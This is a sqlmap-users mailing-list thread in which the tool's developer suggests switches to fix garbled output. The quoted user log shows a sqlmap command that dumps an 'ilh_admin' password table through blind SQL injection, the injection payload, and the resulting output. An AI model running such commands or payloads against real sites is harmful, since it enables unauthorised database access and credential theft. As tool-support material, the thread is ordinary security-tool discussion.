Hi.
Please retry everything from the beginning (--flush-session) with
--text-only or --string. Please try to run without --threads (there are
cases when high number of connections cause problems at the web server
side).
Kind regards,
Miroslav Stampar
On Jul 16, 2013 6:30 PM, "Vinicius Da Loop" <viniciusmaxdal...@gmail.com>
wrote:
>
> log:
>
> imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar"; --technique=B
> --threads=10 --no-cast -T ilh_admin --dump
>
> sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 13:22:41
>
> [13:22:41] [INFO] resuming back-end DBMS 'mysql'
> [13:22:41] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ref
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
> ---
> [13:22:41] [INFO] the back-end DBMS is MySQL
> web application technology: Apache
> back-end DBMS: MySQL 5
> [13:22:41] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) entries
> [13:22:41] [INFO] fetching current database
> [13:22:41] [INFO] retrieving the length of query output
> [13:22:41] [INFO] resumed: 22
>
> [sniped]
>
> [13:22:44] [INFO] retrieving the length of query output
> [13:22:44] [INFO] retrieved: 13
> [13:22:54] [INFO] retrieved: ?????????????
> [13:22:54] [INFO] retrieving the length of query output
> [13:22:54] [INFO] retrieved: 1
> [13:22:58] [INFO] retrieved: _
> [13:23:00] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [13:23:00] [INFO] retrieving the length of query output
> [13:23:00] [INFO] retrieved: 10
> [13:23:09] [INFO] retrieved: ??????????
> [13:23:09] [INFO] analyzing table dump for possible password hashes
> Database: hostl347
> Table: ilh_admin
> [1 entry]
> +----+------------+---------------+
> | id | pass | admin |
> +----+------------+---------------+
> | | ?????????? | ????????????? |
> +----+------------+---------------+
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
See everything from the browser to the database with AppDynamics
Get end-to-end visibility with application monitoring from AppDynamics
Isolate bottlenecks and diagnose root cause in seconds.
Start your free trial of AppDynamics Pro today!
http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
